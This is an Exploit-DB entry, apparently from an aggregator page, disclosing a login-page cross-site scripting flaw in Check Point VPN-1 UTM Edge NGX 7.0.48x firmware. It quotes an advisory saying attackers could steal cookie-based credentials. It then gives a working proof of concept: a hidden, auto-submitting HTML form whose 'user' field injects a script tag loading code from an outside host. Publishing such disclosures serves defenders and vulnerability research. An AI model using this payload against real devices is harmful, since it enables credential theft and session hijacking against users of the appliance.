Lucene search

K
exploitdbHenri LindbergEDB-ID:31340
HistoryMar 06, 2008 - 12:00 a.m.

Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting

2008-03-0600:00:00
Henri Lindberg
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/28116/info

Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x.

<html> <body onload="document.f.submit()"> <form name="f" method="post" action="http://192.168.10.1" style="display:none"> <input name="user" value="'<script/src=//l7.fi></script>"> </form> </body> </html>

AI Score

7.4

Confidence

Low